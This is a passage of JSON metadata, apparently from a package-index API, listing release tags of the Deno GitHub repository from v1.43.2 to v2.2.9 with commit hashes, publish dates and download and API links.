parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.e